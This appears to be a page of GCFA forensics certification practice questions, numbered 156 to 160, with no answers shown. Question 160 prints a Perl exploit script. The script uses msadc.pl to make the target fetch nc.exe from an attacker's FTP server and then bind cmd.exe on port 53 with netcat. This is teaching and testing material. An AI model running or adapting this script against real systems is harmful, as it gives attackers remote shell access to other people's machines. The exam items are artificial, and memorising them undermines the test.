GCFA Exam Question 156

Which of the following file systems cannot be used to install an operating system on the hard disk drive?
Each correct answer represents a complete solution. Choose two.
  • GCFA Exam Question 157

    You work as a Network Administrator for Web World Inc. You want to host an e-commerce Web site on your network. You want to ensure that storage of credit card information is secure. Which of the following conditions should be met to accomplish this?
    Each correct answer represents a complete solution. Choose all that apply.
  • GCFA Exam Question 158

    John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation?
  • GCFA Exam Question 159

    Which of the following Acts enacted in United States amends Civil Rights Act of 1964, providing technical changes affecting the length of time allowed to challenge unlawful seniority provisions, to sue the federal government for discrimination and to bring age discrimination claims?
  • GCFA Exam Question 160

    Adam, a malicious hacker performs an exploit, which is given below:
    #################################################################
    $port = 53;
    # Spawn cmd.exe on port X
    $your = "192.168.1.1";# Your FTP Server 89
    $user = "Anonymous";# login as
    $pass = '[email protected]';# password
    #################################################################
    $host = $ARGV[0];
    print "Starting ...\n";
    print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
    $host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
    \"echo get hacked.
    html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print
    "Server is downloading ...
    \n";
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
    (Have a ftp server)\n";
    $o=; print "Opening ...\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
    #system("telnet $host $port"); exit(0);
    Which of the following is the expected result of the above exploit?